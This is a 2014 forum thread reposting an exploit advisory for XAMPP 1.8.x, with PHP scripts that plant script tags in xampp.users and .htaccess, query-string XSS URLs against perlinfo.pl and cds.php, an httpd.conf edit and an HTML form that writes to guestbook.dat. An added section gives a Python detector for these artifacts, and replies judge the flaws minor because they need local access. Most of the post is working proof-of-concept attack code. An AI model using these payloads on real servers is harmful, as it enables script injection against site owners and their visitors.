XAMPP 1.8.x Multiple Vulnerabilities

10-19-2014, 03:27 PM #1
DevilScreaM
http://1337day.com/exploit/22729

Code:
#Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 6 October 2014
#Vendor : http://bitnami.com
#Version : 1.8.x or Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team


Cross Site Scripting at perlinfo.pl #1

Perl Version : 5.16.3

Script For Exploit

For Localhost

<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f = @fopen('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);

$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "C:\xampp\security\xampp.users"
require valid-user';
$f1 = @fopen('C:\xampp\htdocs\xampp\.htaccess','w');
fwrite($f1 , $htcs);
?>

<script>
window.location = "http://127.0.0.1/xampp/perlinfo.pl"
</script>


==================================================================

For Site

<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f = @fopen('my.users','w');
fwrite($f , $xss);

$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "my.users"
require valid-user';
$f1 = @fopen('.htaccess','w');
fwrite($f1 , $htcs);

$pl = '#!"perl\bin\perl.exe"

use HTML::Perlinfo;
use CGI qw(header);

$q = new CGI;
print $q->header;

$p = new HTML::Perlinfo;
$p->info_general;
$p->info_variables;
$p->info_modules;
$p->info_license;';
$f2 = @fopen('perlinfo.pl','w');
fwrite($f2 , $pl);
?>

<script>
window.location = "http://site.com/perlinfo.pl"
</script>

==================================================================

Save the script as C:\xampp\htdocs\xss.php


Open a browser and run http://127.0.0.1/xss.php
You will be redirected to http://127.0.0.1/xampp/perlinfo.pl

Auth Login
Username : <script>alert('Tested by DevilScreaM')</script>
Password :


===================================================================

Cross Site Scripting at perlinfo.pl Query String #2

Exploit :

http://127.0.0.1/xampp/perlinfo.pl?[XSS]
http://127.0.0.1/xampp/perlinfo.pl?[XSS]=[XSS]

Example

http://127.0.0.1/xampp/perlinfo.pl?<script>alert('DevilScreaM')</script>=<script>alert('Newbie-Security')</script>


====================================================================

Cross Site Scripting at http://127.0.0.1/xampp/perlinfo.pl #3


Exploit :

1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209

Edit ServerAdmin [email protected] to

ServerAdmin [YOUR XSS]

Example :

ServerAdmin <h1>DevilScreaM</h1>


4. Save File

5. See your XSS at

http://127.0.0.1/xampp/perlinfo.pl


====================================================================



Cross Site Scripting at http://127.0.0.1/Webalizer/


Script for Exploit :


<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f = @fopen('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);

?>

<script>
window.location = "http://127.0.0.1/webalizer/usage_[YEARS][MONTH].html"
</script>

Information :
usage_[YEARS][MONTH].html => usage_201410.html

====================================================================

Save the script as Webalizer.php


Command

@echo off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf

PHP

<?php
// Single quotes: in a double-quoted string "\xa" is parsed as a hex escape.
$webalizer = 'C:\xampp\webalizer\webalizer.bat';

system($webalizer);
?>

=====================================================================

Save the script as webalizer.cmd or webalizer_run.php


Run Webalizer.cmd and wait for the process to finish

Result

http://127.0.0.1/webalizer/usage_[years][month].html

Example

http://127.0.0.1/webalizer/usage_201410.html


==================================================================


Cross Site Scripting at cds.php

Exploit :

http://127.0.0.1/xampp/cds.php?interpret=[XSS]

Example :

http://127.0.0.1/xampp/cds.php?interpret=<script>alert('Tested by> DevilScreaM')</script>

View your XSS at

http://127.0.0.1/xampp/cds-fpdf.php


====================================================================



Write File Vulnerability

Script to Exploit :


<form action='http://127.0.0.1/xampp/guestbook-en.pl' method='get'>
<table border='0' cellpadding='0' cellspacing='0'>
<tr><td>TEXT:</td>
<td><input type='text' size='30' value='Tested by DevilScreaM' name='f_name'></td></tr>
<tr><td></td><td><input type='submit' value='WRITE'></td></tr>
</table></form>
<br><br>
<a href="http://127.0.0.1/xampp/guestbook.dat"><b>Result</b></a>

==================================================================

Save the script with the extension .html

Open the script and click Write or change the text

Result

http://127.0.0.1/xampp/guestbook.dat
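
Added example, not part of the original post: a defender-side check for the artifacts this advisory describes, namely markup in query strings sent to the XAMPP demo endpoints, in AuthUserFile usernames, and in the ServerAdmin directive. The function names, log lines and file contents are constructed for illustration, and an Apache combined-style access log is assumed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Endpoints named in the post; requests to other paths are not inspected.
DEMO_ENDPOINTS = ("/xampp/perlinfo.pl", "/xampp/cds.php", "/xampp/guestbook-en.pl")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"[<>]")

def suspicious_requests(log_lines):
    """Return (path, decoded_query) for demo-endpoint hits whose query holds markup."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path.lower() not in DEMO_ENDPOINTS:
            continue
        decoded = unquote_plus(unquote_plus(url.query))  # two passes catch double encoding
        if MARKUP_RE.search(decoded):
            hits.append((url.path, decoded))
    return hits

def markup_in_htpasswd_users(text):
    """Usernames (text before the first ':') in an AuthUserFile that contain markup."""
    users = (line.split(":", 1)[0] for line in text.splitlines() if ":" in line)
    return [u for u in users if MARKUP_RE.search(u)]

def markup_in_server_admin(httpd_conf):
    """ServerAdmin values in httpd.conf that contain markup."""
    pattern = r"^[ \t]*ServerAdmin[ \t]+(.+?)[ \t]*$"
    values = re.findall(pattern, httpd_conf, re.M | re.I)
    return [v for v in values if MARKUP_RE.search(v)]

# Constructed sample data (not taken from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [19/Oct/2014:15:27:01 +0000] "GET /xampp/perlinfo.pl HTTP/1.1" 200 51234',
    '127.0.0.1 - - [19/Oct/2014:15:27:09 +0000] "GET /xampp/cds.php?interpret=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4021',
    '127.0.0.1 - - [19/Oct/2014:15:27:15 +0000] "GET /xampp/perlinfo.pl?%253Ch1%253Ex%253C%252Fh1%253E HTTP/1.1" 200 51301',
    '127.0.0.1 - - [19/Oct/2014:15:27:20 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 312',
]
SAMPLE_USERS = "admin:$apr1$constructed$hash\n<script>alert(1)</script>:\n"
SAMPLE_CONF = 'ServerRoot "C:/xampp/apache"\nServerAdmin <h1>x</h1>\n'

if __name__ == "__main__":
    for path, query in suspicious_requests(SAMPLE_LOG):
        print("request:", path, query)
    print("users:", markup_in_htpasswd_users(SAMPLE_USERS))
    print("ServerAdmin:", markup_in_server_admin(SAMPLE_CONF))
```

A hit from either file check means someone with write access to the XAMPP directory has already changed that file, which is the precondition the replies below discuss.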

10-19-2014, 06:38 PM #2
T3N38R15
DevilScreaM, nothing against you, but why?
This is just another simple injection and you need full system access; where is the sense in that?

10-20-2014, 03:01 AM #3
D30N3
Oh, just accept it as a vulnerability of web apps, not a full-access reverse shell.

Thanks DevilScreaM. Good job.

10-20-2014, 04:30 AM #4
T3N38R15
Hmm, I accept that as a vuln, but on a level between 1 and 10 this is a 0.5.

10-20-2014, 05:00 AM #5
SickSpawn
hmm... good job DevilScreaM

10-25-2014, 02:00 PM #6
[R]azzor
Nice, thanks for sharing.

10-25-2014, 03:13 PM #7
kiraa
Continue...